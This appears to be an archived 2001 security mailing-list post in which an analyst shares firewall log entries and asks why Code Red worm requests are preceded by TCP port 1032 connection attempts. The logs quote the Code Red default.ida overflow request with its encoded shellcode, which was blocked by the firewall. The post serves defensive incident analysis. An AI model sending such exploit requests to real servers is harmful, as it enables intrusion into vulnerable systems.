hi, Long time reader, first time poster... Iv'e been asked to review some logs for a client, and I've discovered some strange entries that I've never seen before. I've searched on all places I know related to security and log analyzis but found nothing... The logs i got to analyze are from august 2001, and before some CodeRed entry I've a connection attempt on TCP port 1032... Here is a sample : xxx.xxx.xxx.xxx : firewall that logged the entries yyy.yyy.yyy.yyy : targetted machines aaa.aaa.aaa.aaa : first CodeRed infected machine aiming the client mavhine bbb.bbb.bbb.bbb : second CodeRed infected machine aiming the cllient machine 3Aug2001 18:37:25 N1004 xxx.xxx.xxx.xxx drop 1032 aaa.aaa.aaa.aaa yyy.yyy.yyy.yyy tcp 3 3463 len 48 3Aug2001 18:37:28 daemon xxx.xxx.xxx.xxx reject http aaa.aaa.aaa.aaa yyy.yyy.yyy.yyy tcp 3 3463 reason Content Security - access denied. resource http://yyy.yyy.yyy.yyy:80/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u 9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 5Aug2001 0:01:44 N1004 xxx.xxx.xxx.xxx drop 1032 bbb.bbb.bbb.bbb yyy.yyy.yyy.yyy tcp 3 3120 len 48 5Aug2001 0:01:49 daemon xxx.xxx.xxx.xxx reject http bbb.bbb.bbb.bbb yyy.yyy.yyy.yyy tcp 3 3120 reason Content Security - access denied. resource http://yyy.yyy.yyy.yyy:80/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090 %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000% u00=a I've asked the owner of the targetted machine and none of his machines seem to use the port TCP 1032 for its "normal" behavior (daemons or services). I've checked aaa.aaa.aaa.aaa n' bbb.bbb.bbb.bbb adresses and they come from Internet provider. At a first glance, i'd say the attacking machines could have been trojanized, but why the targetted systematically get such 1032 connection attempt ? To be honnest I got no idea what it could be... If someone could give me any clue or a piece of help, that would be pretty cool... regards, john Huck ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Fri Nov 16 2001 - 14:39:54 PST